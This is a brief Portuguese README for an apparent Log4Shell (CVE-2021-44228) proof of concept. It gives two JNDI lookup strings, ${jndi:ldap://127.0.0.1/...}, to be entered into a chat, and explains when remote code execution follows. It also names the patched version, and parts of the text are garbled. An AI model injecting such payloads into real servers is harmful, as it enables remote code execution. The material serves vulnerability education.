
Log4j-RCE (CVE-2021-44228) Prova de Conceito com informações adicionais
Esta é uma prova de conceito da RCE do log4j.
Aqui estão alguns links para o CVE-2021-44228:
Este bug afeta quase todas as versões do log4j2 e talvez do log4j1. A versão recomendada para uso é 2.15.0 que corrige a exploração.
${jndi:ldap://127.0.0.1/e} no chat. Se houver um socket aberto na porta 389 o logj4 tenta conectar e bloqueia a comunicação adicional até que ocorra um timeout.THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT! que é um objeto de string serializado do servidor ldap.
${jndi:ldap://127.0.0.1/exe} no chat. Se -Dcom.sun.jndi.ldap.object.trustURLCodebase=true estiver definido como true, a execução remota de código ocorrerá.
Este projeto é apenas para fins educacionais.